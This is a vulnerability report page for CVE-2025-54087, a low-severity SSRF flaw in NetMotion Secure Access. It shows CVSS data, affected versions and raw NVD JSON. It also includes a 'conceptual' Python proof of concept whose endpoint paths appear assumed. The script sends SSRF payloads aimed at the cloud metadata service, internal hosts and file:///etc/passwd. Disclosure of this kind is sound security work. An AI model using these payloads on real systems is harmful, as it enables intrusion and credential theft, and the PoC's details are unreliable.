Security Vulnerability Report
CVE-2025-54087 CVSS 2.6 LOW

CVE-2025-54087

Published: 2025-10-02 20:15:33
Last Modified: 2025-10-16 18:22:43

Description

CVE-2025-54087 is a server-side request forgery vulnerability in Secure Access prior to version 14.10. Attackers with administrative privileges can publish a crafted test HTTP request originating from the Secure Access server. The attack complexity is high, there are no attack requirements, and user interaction is required. There is no direct impact to confidentiality, integrity, or availability. There is a low severity subsequent system impact to integrity.

CVSS Details

CVSS Score
2.6
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:absolute:secure_access:*:*:*:*:*:*:*:* - VULNERABLE
NetMotion Secure Access < 14.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54087 - NetMotion Secure Access SSRF PoC (Conceptual) # This PoC demonstrates the SSRF attack vector through the HTTP test request feature # Note: Requires valid administrative credentials import requests TARGET_HOST = "https://secure-access-target:443" ADMIN_USER = "admin" ADMIN_PASS = "admin_password" # Step 1: Authenticate to Secure Access admin console session = requests.Session() login_url = f"{TARGET_HOST}/admin/login" login_data = { "username": ADMIN_USER, "password": ADMIN_PASS } session.post(login_url, data=login_data, verify=False) # Step 2: Exploit SSRF via HTTP test request feature # The crafted URL is sent from the Secure Access server's perspective ssrf_payloads = [ "http://169.254.169.254/latest/meta-data/", # AWS metadata "http://127.0.0.1:8080/admin/config", # Internal admin panel "http://internal-db.local:3306/", # Internal database "file:///etc/passwd", # Local file read "http://192.168.1.1/management", # Internal network scan ] test_request_url = f"{TARGET_HOST}/admin/tools/test-http-request" for payload in ssrf_payloads: data = { "url": payload, "method": "GET", "timeout": 10 } response = session.post(test_request_url, data=data, verify=False) print(f"Target: {payload}") print(f"Response: {response.text[:500]}") print("-" * 50) # Step 3: Extract sensitive information from responses # The server-side response may contain internal network information

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54087", "sourceIdentifier": "[email protected]", "published": "2025-10-02T20:15:32.830", "lastModified": "2025-10-16T18:22:43.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CVE-2025-54087 is a server-side request forgery\nvulnerability in Secure Access prior to version 14.10. Attackers with\nadministrative privileges can publish a crafted test HTTP request originating\nfrom the Secure Access server. The attack complexity is high, there are no\nattack requirements, and user interaction is required. There is no direct\nimpact to confidentiality, integrity, or availability. There is a low severity\nsubsequent system impact to integrity."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:N", "baseScore": 2.6, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:absolute:secure_access:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.10", "matchCriteriaId": "A4C71B0A-C4A4-421F-A1B4-0CCD7FECEBF1"}]}]}], "references": [{"url": "https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2025-54087", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}